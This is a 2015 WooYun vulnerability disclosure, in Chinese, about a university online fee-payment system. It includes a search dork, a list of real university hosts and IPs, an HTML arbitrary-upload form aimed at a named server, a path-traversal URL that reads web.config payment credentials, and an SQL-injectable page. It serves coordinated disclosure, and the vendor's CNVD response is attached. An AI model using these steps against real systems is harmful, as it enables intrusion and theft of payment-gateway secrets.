当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099743

漏洞标题:某高校在用网上银行缴费系统通用漏洞打包

相关厂商:神州浩天

漏洞作者: 路人甲

提交时间:2015-03-09 18:58

修复时间:2015-06-11 18:00

公开时间:2015-06-11 18:00

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向第三方安全合作伙伴开放
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-17: 细节向普通白帽子公开
2015-05-27: 细节向实习白帽子公开
2015-06-11: 细节向公众公开

简要描述:

因为资金往来,还是比较重要的.所以就不深入了.

详细说明:

关键词:intitle:网银收费系统
百度google搜索即可.

1.png


下面是给出部分用户列表.
222.180.192.243 | 222.180.192.243 | 电信 | 重庆市|
202.38.194.47 | 202.38.194.47 | 华南理工大学逸夫楼实验室 | 广东省广州市|
218.199.196.90 | 218.199.196.90 | 华中师范大学 | 湖北省武汉市|
www.wsjf.sdnu.edu.cn | 210.44.2.131 | 山东师范大学 | 山东省济南市|
wyjf.zjnu.edu.cn | 210.33.81.6 | 浙江师范大学 | 浙江省杭州市|
sfcx.zjnu.edu.cn | 61.153.34.35 | 浙江师范大学 | 浙江省金华市|
wsjf.scuec.edu.cn | 210.42.144.61 | 中南民族大学 | 湖北省武汉市|
59.67.79.53 | 59.67.79.53 | 天津师范大学 | 天津市|
tyjfzfpt.nwsuaf.edu.cn | 219.245.200.6 | 西北农林科技大学 | 陕西省西安市|
218.199.48.15 | 218.199.48.15 | 荆楚理工学院 | 湖北省荆门市|
219.243.39.24 | 219.243.39.24 | 天津大学 | 天津市|
jccpay.hzau.edu.cn | 211.69.128.221 | 南苑小区 | 华中农业大学|
sfpt.tjufe.edu.cn | 202.113.129.9 | 天津财经大学 | 天津市|
wlzf.cuit.edu.cn | 210.41.225.229 | 成都信息工程学院 | 四川省成都市|
tyzfpt.tust.edu.cn | 210.31.130.5 | 天津科技大学 | 天津市|
xysf.hnu.edu.cn | 210.43.96.249 | 湖南大学 | 湖南省长沙市|
218.104.195.23 | 218.104.195.23 | 遵义医学院珠海校区 | 广东省珠海市|
218.6.128.133 | 218.6.128.133 | 西华师范大学 | 四川省南充市|
zfpt.ahnu.edu.cn | 210.45.192.187 | 安徽师范大学 | 安徽省芜湖市|
zfpt.whu.edu.cn | 210.42.122.136 | 湖北医科大学 | 湖北省武汉市|
fin.hrbnu.edu.cn | 218.7.221.97 | 哈尔滨师范大学松北校区 | 黑龙江省哈尔滨市|
61.128.176.29 | 61.128.176.29 | 电信 | 重庆市|
wszf.nwpu.edu.cn | 222.24.230.9 | 西北工业大学 | 陕西省西安市|
219.243.56.101 | 219.243.56.101 | 天津工业职业技术学院 | 天津市|
jdsf.ujn.edu.cn | 124.133.254.54 | 联通 | 山东省济南市|
jdsf.ujn.edu.cn | 124.133.254.55 | 联通 | 山东省济南市|
61.153.34.35 | 61.153.34.35 | 浙江师范大学 | 浙江省金华市|
59.67.71.224 | 59.67.71.224 | 天津师范大学 | 天津市|
210.41.225.229 | 210.41.225.229 | 成都信息工程学院 | 四川省成都市|
jf.cqwu.net | 222.179.99.200 | 电信 | 重庆市|

漏洞证明:

1)前台直接getshell.
任意文件上传漏洞
我们先看看发包的过程.

2.png


然后,发现此页面前台为授权即可访问到.
所以,只要模拟这个发包的过程即可.

<html>
<form action="http://wszf.nwpu.edu.cn/admin/Fileup.aspx?path=notice/" method="post" enctype="multipart/form-data">
<input type="file" name="file1" size="23" id="file" />
<input type="submit" value="Submit" />
</form>
</html>


3.png


4.png


注释:上面的path可以自己定义,既可以上传web目录下的任意路径.文件任意后缀均可上传.
上传一句话,然后win下提权不是很复杂.
2)任意文件下载漏洞.
可以看到这个cms对路径过滤的不是很严格.
依然是出在同目录的down.aspx文件上面.

5.png


6.png


可以获得银联接口配置文件,也有很多是支付宝的接口.
如果被恶意更改,带来的损失很影响还是很大的.望早日修复.
下载相对路径:
/admin/down.aspx?type=notice&mc=../../../web.config
不同版本间可能存在些许差异.
3)sql注入漏洞.部分版本前台可注入.
漏洞文件:
http://www.wsjf.sdnu.edu.cn/admin/notice/notice_index.aspx

7.png


单文件2处post注入.支持union和堆叠查询.还是比较容易出数据的.

8.png


9.png


4)前台xml配置文件可控.有钓鱼的风险.有可能xml实体注入.有可能储存性xss
相对链接:
/admin/attention/attentionopa.aspx

10.png


输入的即覆盖到根目录下的xml文件.

11.png


12.png


因为输入的不是xml的语法,所以报错.

修复方案:

修复你们肯定在行

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-03-13 17:59

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无